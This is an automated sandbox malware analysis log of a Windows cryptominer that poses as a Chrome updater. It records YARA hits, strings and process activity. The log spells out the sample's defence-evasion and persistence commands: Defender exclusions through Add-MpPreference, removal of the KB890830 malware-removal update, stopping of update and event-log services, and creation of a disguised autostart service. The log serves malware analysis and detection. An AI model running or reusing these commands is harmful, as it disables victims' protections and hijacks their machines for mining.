Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: updater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects coinmining malware Author: ditekSHen
Source: Process Memory Space: updater.exe PID: 3620, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: TwrhjEKqxk.exe | Static PE information: section name: (unprintable characters, 8 sections)
Source: updater.exe.0.dr | Static PE information: section name: (unprintable characters, 8 sections)
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\System32\conhost.exe | Code function: 57_2_0000000140001394 NtSetTimer2
Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\mnidgyzvuran.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_xfvot4ly.d1u.ps1
Source: C:\Windows\System32\conhost.exe | Code function: 57_2_0000000140003160
Source: C:\Windows\System32\conhost.exe | Code function: 57_2_00000001400026E0
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\mnidgyzvuran.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: updater.exe.0.dr | Static PE information: Number of sections : 14 > 10
Source: TwrhjEKqxk.exe | Static PE information: Number of sections : 14 > 10
Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: Process Memory Space: updater.exe PID: 3620, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 0.9915558370276546
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 1.002230784830663
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 1.0413533834586466
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 1.5625
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 1.030054644808743
Source: TwrhjEKqxk.exe | Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: TwrhjEKqxk.exe | Static PE information: Section: .reloc ZLIB complexity 1.5
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9915558370276546
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 1.002230784830663
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 1.0413533834586466
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 1.5625
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 2.3333333333333335
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 1.030054644808743
Source: updater.exe.0.dr | Static PE information: Section: ZLIB complexity 1.1047619047619048
Source: updater.exe.0.dr | Static PE information: Section: .reloc ZLIB complexity 1.5
Source: mnidgyzvuran.sys.34.dr | Binary string: \Device\WinRing0_1_2_0
Source: classification engine | Classification label: mal100.adwa.spyw.evad.mine.winEXE@82/13@1/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6620:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2516:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5280:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bno5m1rc.e3z.ps1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\Google\Chrome\updater.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: TwrhjEKqxk.exe | ReversingLabs: Detection: 55%
Source: TwrhjEKqxk.exe | Virustotal: Detection: 45%
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | File read: C:\Users\user\Desktop\TwrhjEKqxk.exe
Source: unknown | Process created: C:\Users\user\Desktop\TwrhjEKqxk.exe "C:\Users\user\Desktop\TwrhjEKqxk.exe"
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\TwrhjEKqxk.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
